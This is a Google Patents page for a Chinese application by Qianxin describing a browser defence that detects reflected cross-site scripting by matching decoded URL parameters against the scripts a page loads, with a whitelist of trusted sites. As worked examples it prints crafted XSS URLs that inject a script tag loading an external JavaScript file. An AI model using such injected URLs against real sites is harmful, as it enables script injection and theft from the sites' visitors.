CN114329459A - 浏览器防护方法及装置 - Google Patents

浏览器防护方法及装置 Download PDF

Info

Publication number
CN114329459A
CN114329459A CN202111370635.7A CN202111370635A CN114329459A CN 114329459 A CN114329459 A CN 114329459A CN 202111370635 A CN202111370635 A CN 202111370635A CN 114329459 A CN114329459 A CN 114329459A
Authority
CN
China
Prior art keywords
target website
resource address
script
website
browser
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202111370635.7A
Other languages
English (en)
Inventor
陈俊儒
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Qianxin Technology Group Co Ltd
Qianxin Safety Technology Zhuhai Co Ltd
Original Assignee
Qianxin Technology Group Co Ltd
Qianxin Safety Technology Zhuhai Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Qianxin Technology Group Co Ltd, Qianxin Safety Technology Zhuhai Co Ltd filed Critical Qianxin Technology Group Co Ltd
Priority to CN202111370635.7A priority Critical patent/CN114329459A/zh
Publication of CN114329459A publication Critical patent/CN114329459A/zh
Pending legal-status Critical Current

Links

Images

Abstract

本发明实施例提供一种浏览器防护方法及装置,包括:响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。能有效过滤对浏览器发起攻击的脚本。

Description

浏览器防护方法及装置
技术领域
本发明涉及网络安全领域,尤其涉及一种浏览器防护方法及装置。
背景技术
相关技术中,浏览器是一种用于检索并展示万维网信息资源的应用程序。这些信息资源可为网页、图片、影音或其他内容,它们由统一资源标志符(Uniform ResourceLocator,简称URL)标志。信息资源中的超链接可使用户方便地浏览相关信息。
随着信息化时代的不断发展,人们使用计算机进行网上冲浪的人们越来越多。所以很多黑客开始对网页进行攻击、篡改,添加恶意脚本,使用户在浏览被篡改的网页时主动加载这种恶意脚本,达到攻击者的目的。由于浏览器无法识别网页加载的脚本是正常的还是非正常的,导致浏览器可能加载和执行恶意脚本,给设备带来了安全风险,这一问题是目前业界亟待解决的。
发明内容
针对现有技术中的问题,本发明实施例提供一种浏览器防护方法及装置。
具体地,本发明实施例提供了以下技术方案:
第一方面,本发明实施例提供了一种浏览器防护方法,包括:响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。
进一步地,获取所述资源地址中的参数信息,包括:基于资源地址的编码机制,对所述资源地址进行解码,获取所述目标网站的域名和所述参数信息。
进一步地,所述基于资源地址的编码机制,对所述资源地址进行解码,获取所述目标网站的域名和所述参数信息,包括:基于特殊URL符号列表,对统一资源定位符进行字符串切割处理,获取所述目标网站的域名和所述统一资源定位符中的参数名称和参数值;将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配,包括:将所述参数值与所述目标网站加载的脚本的名称进行字符串匹配;判断在所述脚本的名称中是否存在所述参数值;若在所述脚本的名称中存在所述参数值,则匹配成功;否则,匹配失败。
进一步地,所述响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息之后,还包括:将所述目标网站的域名和所述目标网站加载的脚本信息,与预先设置的白库中存储的可信网站的域名和所述可信网站加载的脚本信息进行匹配;判断在所述白库中是否存在所述目标网站的域名和所述目标网站加载的脚本信息;若在所述白库中存在所述目标网站的域名和所述目标网站加载的脚本信息,根据所述资源地址打开所述目标网站;否则,将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配。
进一步地,所述响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息之前,还包括:通过网站热点脚本采集器采集至少一个可信网站的域名和所述可信网站加载的脚本信息;对所采集的至少一个可信网站的域名和所述可信网站加载的脚本信息进行存储,得到所述白库。第二方面,本发明实施例还提供了一种浏览器防护装置,包括:第一处理模块,用于响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;第二处理模块,用于将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。
第三方面,本发明实施例还提供了一种电子设备,包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序,所述处理器执行所述程序时实现如第一方面所述浏览器防护方法的步骤。
第四方面,本发明实施例还提供了一种非暂态计算机可读存储介质,其上存储有计算机程序,该计算机程序被处理器执行时实现如第一方面所述浏览器防护方法的步骤。
第五方面,本发明实施例还提供了一种计算机程序产品,其上存储有可执行指令,该指令被处理器执行时使处理器实现第一方面所述浏览器防护方法的步骤。
本发明实施例提供的浏览器防护方法及装置,通过响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。由于一般网站不会通过资源地址(比如URL)加载脚本,因此,将从资源地址中得到的参数信息与所述目标网站加载的脚本信息进行字符串匹配,判断所述资源地址是否为跨站脚本攻击,能实现对异常脚本的过滤和拦截。
附图说明
为了更清楚地说明本发明实施例或现有技术中的技术方案,下面将对实施例或现有技术描述中所需要使用的附图作一简单地介绍,显而易见地,下面描述中的附图是本发明的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
图1为本发明浏览器防护方法的实施例流程图;
图2为本发明浏览器防护方法的另一些实施例流程图;
图3a为本发明浏览器防护方法的一个应用场景示意图;
图3b为本发明浏览器防护方法的一个应用场景示意图;
图3c为本发明浏览器防护方法的一个应用场景示意图;
图4为本发明浏览器防护装置的一些实施例的结构示意图;
图5是根据本发明提供的电子设备的结构示意图。
具体实施方式
为使本发明实施例的目的、技术方案和优点更加清楚,下面将结合本发明实施例中的附图,对本发明实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例是本发明一部分实施例,而不是全部的实施例。基于本发明中的实施例,本领域普通技术人员在没有作出创造性劳动前提下所获得的所有其他实施例,都属于本发明保护的范围。
下面将参考附图并结合实施例来详细说明本发明。
请参阅图1,图1为本发明浏览器防护方法的实施例流程图。如图1所示,该浏览器防护方法,包括以下步骤:
步骤101,响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息。
在一些实施例中,可以通过浏览器接收资源地址的输入,浏览器是运行在任一电子设备上的应用程序,可以是系统内置浏览器(如windows操作系统内置的IE浏览器)或者是外部应用商店下载的浏览器,电子设备如台式电脑,笔记本,手机,平板电脑等可以接入网络的设备。浏览器响应设备或者用户的网站请求,向对应的解析服务器或者数据服务器发送网站请求。资源地址可以是统一资源定位符(UniformResourceLocator,简称URL)是互联网上用来标识某一处资源的地址。URL作为常用的资源地址,有利于浏览器处理和接收更大范围的信息。资源地址对应的目标网站加载的脚本信息可以通过网站热点脚本采集器采集获得,脚本信息可以理解为加载目标网站所需的脚本地址。
一个完整的URL可以包括以下几部分:
1、协议部分:URL的协议部分为“http:”,这代表网页使用的是HTTP协议。在Internet中可以使用多种协议,如HTTP,FTP等。以上述URL为例,使用的是HTTP协议。在"HTTP"后面的“//”为分隔符。
2、域名部分:该URL的域名部分为“xss.test”。一个URL中,也可以使用IP地址作为域名使用。
3、端口部分:跟在域名后面的是端口,域名和端口之间使用“:”作为分隔符。端口不是一个URL必须的部分,如果省略端口部分,将采用默认端口。以上述URL为例,将采用默认端口。
4、虚拟目录部分:从域名后的第一个“/”开始到最后一个“/”为止,是虚拟目录部分。虚拟目录也不是一个URL必须的部分。以上述URL为例,没有采用虚拟目录。
5、文件名部分:从域名后的最后一个“/”开始到“?”为止,是文件名部分,如果没有“?”,则是从域名后的最后一个“/”开始到“#”为止,是文件部分,如果没有“?”和“#”,那么从域名后的最后一个“/”开始到结束,都是文件名部分。以上述URL为例,文件名是“xss_demo.php”。文件名部分也不是一个URL必须的部分,如果省略该部分,则使用默认的文件名
6、锚部分:从“#”开始到最后,都是锚部分。以上述URL为例,没有锚的部分。锚部分也不是一个URL必须的部分。
7、参数部分:从“?”开始到“#”为止之间的部分为参数部分,又称搜索部分、查询部分。本例中的参数部分为“address1=北京&address2=山东&script=http://xxx.com/xss.js%22%3E%3C/script%3E%3C!--”。参数可以允许有多个参数,参数与参数之间用“&”作为分隔符。
仍以上述URL为例,目标网站的域名可以是“xss.test”,参数信息可以是“北京”、“山东”和“http://xxx.com/xss.js%22%3E%3C/script%3E%3C!--”。
步骤102,将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
在一些实施例中,跨站脚本(cross site script,简称为XSS),是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。目标网站加载的脚本信息可以是通过网站热点脚本采集器采集得到的,资源地址包括目标网站的域名和参数信息,仍以上述为例,参数信息可以是“北京”、“山东”和“http://xxx.com/xss.js%22%3E%3C/script%3E%3C!--”,将参数信息与目标网站加载的脚本信息匹配,其中,参数信息中的脚本地址可能是不完整的,而目标网站加载的脚本信息中的脚本地址是完整的,因此,将参数信息与目标网站加载的脚本信息进行字符串匹配,若目标网站加载的脚本信息中某段字符串与参数信息可以匹配,则确定匹配成功的脚本信息形成跨站脚本攻击。本发明对拦截或警告的方式不做限定。
本发明一些实施例公开的浏览器防护方法,通过响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息,资源地址包括目标网站的域名和参数信息;将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。由于一般网站不会通过资源地址(比如URL)控制加载脚本,因此,将参数信息与目标网站加载的脚本信息进行字符串匹配,判断资源地址是否为跨站脚本攻击,能实现对异常脚本的过滤和拦截。
请参阅图2,图2为本发明浏览器防护方法的另一些实施例流程图。如图2所示,该浏览器防护方法,包括以下步骤:
步骤201,通过网站热点脚本采集器采集至少一个可信网站的域名和可信网站加载的脚本信息;对所采集的至少一个可信网站的域名和可信网站加载的脚本信息进行存储,得到白库。
在一些实施例中,网站热点脚本采集器可以用现有的工具,也可以编写用于采集脚本的脚本代码,例如,可以利用Phantomjs、nodejs等工具编写代码。可信网站加载的脚本信息为加载可信网站所需的脚本地址。
在一些实施例中,结构化数据一般指存储在数据库中,具有一定逻辑结构和物理结构的数据,最为常见的是存储在关系数据库中的数据;非结构化数据:一般指结构化数据以外的数据,这些数据不存储在数据库中,而是以各种类型的文本形式存放,其中Web上的一些数据(内嵌于HTML或XML标记中)又具有一定的逻辑结构和物理结构,被称为半结构数据。本发明中对至少一个可信网站的域名和可信网站加载的脚本信息的存储可以根据需要选择存储方式。
步骤202,响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息。
在一些实施例中,步骤202的具体实现及其所带来的技术效果,可以参考图1对应的实施例中的步骤101,在此不再赘述。
步骤203,将目标网站的域名和目标网站加载的脚本信息,与预先设置的白库中存储的可信网站的域名和可信网站加载的脚本信息进行匹配;判断在白库中是否存在目标网站的域名和目标网站加载的脚本信息;若在白库中存在目标网站的域名和目标网站加载的脚本信息,根据资源地址打开目标网站;否则,将参数信息与目标网站加载的脚本信息进行字符串匹配。
在一些实施例中,目标网站加载的脚本信息为本次加载目标网站需要的脚本地址,白库中存储有目标网站在可信状态下需要加载的脚本信息(即脚本地址)。将目标网站的域名和可信网站的域名对应的脚本信息进行对比,若在白库中存在目标网站的域名和目标网站加载的脚本信息,根据资源地址打开目标网站;否则,将参数信息与目标网站加载的脚本信息进行字符串匹配。可以加快浏览器防护的效率。
步骤204,将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
在一些实施例中,步骤204的具体实现及其所带来的技术效果,可以参考图1对应的实施例中的步骤102,在此不再赘述。
从图2中可以看出,与图1对应的一些实施例的描述相比,图2对应的一些实施例中的浏览器防护方法体现了如何建立白库的过程,可以通过网站热点脚本采集器采集至少一个可信网站的域名和可信网站加载的脚本信息;对所采集的至少一个可信网站的域名和可信网站加载的脚本信息进行存储,得到白库,将目标网站的域名和目标网站加载的脚本信息,与预先设置的白库中存储的可信网站的域名和可信网站加载的脚本信息进行匹配,有利于提高对异常脚本的过滤效率。
在一些可选的实现方式中,获取资源地址中的参数信息,包括:基于资源地址的编码机制,对资源地址进行解码,获取目标网站的域名和参数信息。
在一些实施例中,编码机制,即URL encoding(或称URL编码),也称作百分号编码(Percent-encoding),是特定上下文的统一资源定位符(简称URL)的编码机制。URL编码适用于统一资源标识符(URI)的编码,也用于为quot;application/x-www-form-urlencodedquot;MIME准备数据,因为它用于通过HTTP的请求操作(request)提交HTML表单数据。URL编码,可以通过urldecode函数对字符串进行URL解码。例如通过urlencode编码后的字符串,可通过UrlDecode进行解码。对URL路径加码的函数是UrlEncode用法相反,和UrlDecode是一致对应的。
在一些可选的实现方式中,基于资源地址的编码机制,对资源地址进行解码,获取目标网站的域名和参数信息,包括:基于特殊URL符号列表,对统一资源定位符进行字符串切割处理,获取目标网站的域名和统一资源定位符中的参数名称和参数值;将参数信息与目标网站加载的脚本信息进行字符串匹配,包括:将参数值与目标网站加载的脚本的名称进行字符串匹配;判断在脚本的名称中是否存在参数值;若在脚本的名称中存在参数值,则匹配成功;否则,匹配失败。
通常如果要传输的信息需要编码,说明这样的信息并不适合传输。原因多种多样,如包含隐私数据,对于URL来说,之所以要进行编码,是因为Url中有些字符会引起歧义。例如URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/s?q=abc&ie=utf-8。如果要传输的信息的value字符串中包含了=或者&,那么势必会造成接收URL的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。那么,相应的在接收到信息后,需要将其解码转义。利用特殊URL符号列表能够简单快速的将其解码转义。
以上述URL为例,根据资源地址获取对应的目标网站域名可以是“xss.test”,脚本信息可以是“北京”、“山东”和“http://xxx.com/xss.js%22%3E%3C/script%3E%3C!--”,需要将脚本信息进行解码转义,根据特殊URL符号列表,将脚本信息“http://xxx.com/xss.js%22%3E%3C/script%3E%3C!--”进行转义,得到“http://xxx.com/xss.js”><script><!--”。
图3a为本发明浏览器防护方法的一个应用场景示意图,当正常访问网站时,如图3a中,正常地址URL为:http://xss.test/xss_demo.php?address1=北京,可以看到,如图3b,此时并没有加载攻击脚本。
当攻击者将带有攻击命令的地址发给被攻击者,并通过欺骗等手段让攻击者打开。如果被攻击者打开带有攻击命令的脚本,此时,浏览器中就会加载攻击者想要加载的攻击脚本,如图3c,通过构造恶意URL地址,诱导被攻击者访问有带有XSS漏洞网站的攻击场景,其中,恶意URL地址为:http://xss.test/xss_demo.php?address1=%22/%3E%3Cscript%20src=%22https://dss0.bdstatic.com/5aV1bjqh_Q23odCf/static/newmusic/js/newmusic_min_c7fb6ae7.js%22%3E%3C/script%3E%3C!--,可以看出,address1参数后面为攻击脚本的路径,使用特殊URL符号列表解码后,得出浏览器地址栏未方便显示的攻击脚本,即攻击脚本为newmusic_min_c7fb6ae7.js。
请参阅图4,图4为本发明浏览器防护装置的一些实施例的结构示意图,作为对上述各图所示方法的实现,本发明还提供了一种浏览器防护装置的一些实施例,这些装置实施例与图1所示的一些方法的实施例相对应,且该装置可以应用于各种电子设备中。
如图4所示,一些实施例的浏览器防护装置400包括第一处理模块401、第二处理模块402:第一处理模块401,用于响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息;第二处理模块402,用于将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
在一些实施例的可选实现方式中,第一处理模块401还用于:基于资源地址的编码机制,对资源地址进行解码,获取目标网站的域名和参数信息。
在一些实施例的可选实现方式中,第一处理模块401还用于:基于特殊URL符号列表,对统一资源定位符进行字符串切割处理,获取目标网站的域名和统一资源定位符中的参数名称和参数值;将参数信息与目标网站加载的脚本信息进行字符串匹配,包括:将参数值与目标网站加载的脚本的名称进行字符串匹配;判断在脚本的名称中是否存在参数值;若在脚本的名称中存在参数值,则匹配成功;否则,匹配失败。
在一些实施例的可选实现方式中,装置400还包括:第三处理单元,用于将目标网站的域名和目标网站加载的脚本信息,与预先设置的白库中存储的可信网站的域名和可信网站加载的脚本信息进行匹配;判断在白库中是否存在目标网站的域名和目标网站加载的脚本信息;若在白库中存在目标网站的域名和目标网站加载的脚本信息,根据资源地址打开目标网站;否则,将参数信息与目标网站加载的脚本信息进行字符串匹配。
在一些实施例的可选实现方式中,装置400还包括:第四处理单元,用于通过网站热点脚本采集器采集至少一个可信网站的域名和可信网站加载的脚本信息;对所采集的至少一个可信网站的域名和可信网站加载的脚本信息进行存储,得到白库
可以理解的是,该装置400中记载的各模块与参考图1描述的方法中的各个步骤相对应。由此,上文针对方法描述的操作、特征以及产生的有益效果同样适用于装置400及其中包含的模块、单元,在此不再赘述。
图5示例了一种电子设备的实体结构示意图,如图5所示,该电子设备可以包括:处理器(processor)510、通信接口(Communications Interface)520、存储器(memory)530和通信总线540,其中,处理器510,通信接口520,存储器530通过通信总线540完成相互间的通信。处理器510可以调用存储器530中的逻辑指令,以执行浏览器防护方法,例如包括:响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息;将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
此外,上述的存储器530中的逻辑指令可以通过软件功能单元的形式实现并作为独立的产品销售或使用时,可以存储在一个计算机可读取存储介质中。基于这样的理解,本发明的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的部分可以以软件产品的形式体现出来,该计算机软件产品存储在一个存储介质中,包括若干指令用以使得一台计算机设备(可以是个人计算机,服务器,或者网络设备等)执行本发明各个实施例方法的全部或部分步骤。而前述的存储介质包括:U盘、移动硬盘、只读存储器(ROM,Read-Only Memory)、随机存取存储器(RAM,Random Access Memory)、磁碟或者光盘等各种可以存储程序代码的介质。
另一方面,本发明还提供一种计算机程序产品,上述计算机程序产品包括存储在非暂态计算机可读存储介质上的计算机程序,上述计算机程序包括程序指令,当上述程序指令被计算机执行时,计算机能够执行上述各方法所提供的浏览器防护方法,例如包括:响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息;将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
另一方面,本发明实施例还提供一种非暂态计算机可读存储介质,其上存储有计算机程序,该计算机程序被处理器执行时实现以执行上述各实施例提供的浏览器防护方法,例如包括:响应于浏览器接收到资源地址,获取资源地址中的参数信息和资源地址对应的目标网站加载的脚本信息;将参数信息与目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对匹配成功的脚本信息的加载进行拦截或警告;否则,根据资源地址打开目标网站。
以上所描述的装置实施例仅仅是示意性的,其中作为分离部件说明的单元可以是或者也可以不是物理上分开的,作为单元显示的部件可以是或者也可以不是物理单元,即可以位于一个地方,或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部模块来实现本实施例方案的目的。本领域普通技术人员在不付出创造性的劳动的情况下,即可以理解并实施。
通过以上的实施方式的描述,本领域的技术人员可以清楚地了解到各实施方式可借助软件加必需的通用硬件平台的方式来实现,当然也可以通过硬件。基于这样的理解,上述技术方案本质上或者说对现有技术做出贡献的部分可以以软件产品的形式体现出来,该计算机软件产品可以存储在计算机可读存储介质中,如ROM/RAM、磁碟、光盘等,包括若干指令用以使得一台计算机设备(可以是个人计算机,服务器,或者网络设备等)执行各个实施例或者实施例的某些部分的方法。
最后应说明的是:以上实施例仅用以说明本发明的技术方案,而非对其限制;尽管参照前述实施例对本发明进行了详细的说明,本领域的普通技术人员应当理解:其依然可以对前述各实施例所记载的技术方案进行修改,或者对其中部分技术特征进行等同替换;而这些修改或者替换,并不使相应技术方案的本质脱离本发明各实施例技术方案的精神和范围。

Claims (9)

1.一种浏览器防护方法,其特征在于,包括:
响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;
将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。
2.根据权利要求1所述的浏览器防护方法,其特征在于,获取所述资源地址中的参数信息,包括:
基于资源地址的编码机制,对所述资源地址进行解码,获取所述目标网站的域名和所述参数信息。
3.根据权利要求2所述的浏览器防护方法,其特征在于,所述基于资源地址的编码机制,对所述资源地址进行解码,获取所述目标网站的域名和所述参数信息,包括:
基于特殊URL符号列表,对统一资源定位符进行字符串切割处理,获取所述目标网站的域名和所述统一资源定位符中的参数名称和参数值;以及
将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配,包括:
将所述参数值与所述目标网站加载的脚本的名称进行字符串匹配;
判断在所述脚本的名称中是否存在所述参数值;
若在所述脚本的名称中存在所述参数值,则匹配成功;否则,匹配失败。
4.根据权利要求2至3任一项所述的浏览器防护方法,其特征在于,所述响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息之后,还包括:
将所述目标网站的域名和所述目标网站加载的脚本信息,与预先设置的白库中存储的可信网站的域名和所述可信网站加载的脚本信息进行匹配;
判断在所述白库中是否存在所述目标网站的域名和所述目标网站加载的脚本信息;
若在所述白库中存在所述目标网站的域名和所述目标网站加载的脚本信息,根据所述资源地址打开所述目标网站;否则,将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配。
5.根据权利要求4所述的浏览器防护方法,其特征在于,所述响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息之前,还包括:
通过网站热点脚本采集器采集至少一个可信网站的域名和所述可信网站加载的脚本信息;
对所采集的至少一个可信网站的域名和所述可信网站加载的脚本信息进行存储,得到所述白库。
6.一种浏览器防护装置,其特征在于,所述装置包括:
第一处理模块,用于响应于浏览器接收到资源地址,获取所述资源地址中的参数信息和所述资源地址对应的目标网站加载的脚本信息;
第二处理模块,用于将所述参数信息与所述目标网站加载的脚本信息进行字符串匹配;若匹配成功,确定匹配成功的脚本信息形成跨站脚本攻击,对所述匹配成功的脚本信息的加载进行拦截或警告;否则,根据所述资源地址打开所述目标网站。
7.一种电子设备,包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序,其特征在于,所述处理器执行所述程序时实现如权利要求1至5任一项所述浏览器防护方法的步骤。
8.一种非暂态计算机可读存储介质,其上存储有计算机程序,其特征在于,该计算机程序被处理器执行时实现如权利要求1至5任一项所述浏览器防护方法的步骤。
9.一种计算机程序产品,其上存储有可执行指令,其特征在于,该指令被处理器执行时使处理器实现如权利要求1至5中任一项所述浏览器防护方法的步骤。
CN202111370635.7A 2021-11-18 2021-11-18 浏览器防护方法及装置 Pending CN114329459A (zh)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202111370635.7A CN114329459A (zh) 2021-11-18 2021-11-18 浏览器防护方法及装置

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202111370635.7A CN114329459A (zh) 2021-11-18 2021-11-18 浏览器防护方法及装置

Publications (1)

Publication Number Publication Date
CN114329459A true CN114329459A (zh) 2022-04-12

Family

ID=81046216

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202111370635.7A Pending CN114329459A (zh) 2021-11-18 2021-11-18 浏览器防护方法及装置

Country Status (1)

Country Link
CN (1) CN114329459A (zh)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117077138A (zh) * 2023-08-21 2023-11-17 北京安天网络安全技术有限公司 一种基于浏览器的异常检测方法、系统、介质及设备

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117077138A (zh) * 2023-08-21 2023-11-17 北京安天网络安全技术有限公司 一种基于浏览器的异常检测方法、系统、介质及设备
CN117077138B (zh) * 2023-08-21 2024-03-08 北京安天网络安全技术有限公司 一种基于浏览器的异常检测方法、系统、介质及设备

Similar Documents

Publication Publication Date Title
US8819819B1 (en) Method and system for automatically obtaining webpage content in the presence of javascript
US7343626B1 (en) Automated detection of cross site scripting vulnerabilities
US8578481B2 (en) Method and system for determining a probability of entry of a counterfeit domain in a browser
US8225392B2 (en) Immunizing HTML browsers and extensions from known vulnerabilities
JP5576999B2 (ja) 外部リンク処理
US20070136809A1 (en) Apparatus and method for blocking attack against Web application
CN101895516B (zh) 一种跨站脚本攻击源的定位方法及装置
CN107209831B (zh) 用于识别网络攻击的系统和方法
CN101964025A (zh) Xss检测方法和设备
US11831617B2 (en) File upload control for client-side applications in proxy solutions
US9009821B2 (en) Injection attack mitigation using context sensitive encoding of injected input
CN104601540A (zh) 一种跨站脚本XSS攻击防御方法及Web服务器
CN104519008A (zh) 跨站脚本攻击防御方法和装置、应用服务器
CN113645234B (zh) 基于蜜罐的网络防御方法、系统、介质及装置
CN113518077A (zh) 一种恶意网络爬虫检测方法、装置、设备及存储介质
US8789177B1 (en) Method and system for automatically obtaining web page content in the presence of redirects
CN114329459A (zh) 浏览器防护方法及装置
CN114024728A (zh) 一种蜜罐搭建方法以及应用方法
CN110708308B (zh) 一种面向云计算环境的跨站脚本漏洞挖掘方法及系统
US11128639B2 (en) Dynamic injection or modification of headers to provide intelligence
CN112287349A (zh) 安全漏洞检测方法及服务端
Barhoom et al. A new server-side solution for detecting cross site scripting attack
CN116015777A (zh) 一种文档检测方法、装置、设备及存储介质
US10044728B1 (en) Endpoint segregation to prevent scripting attacks
CN114168950B (zh) 一种跨站脚本攻击漏洞的修复方法、装置、设备及产品

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination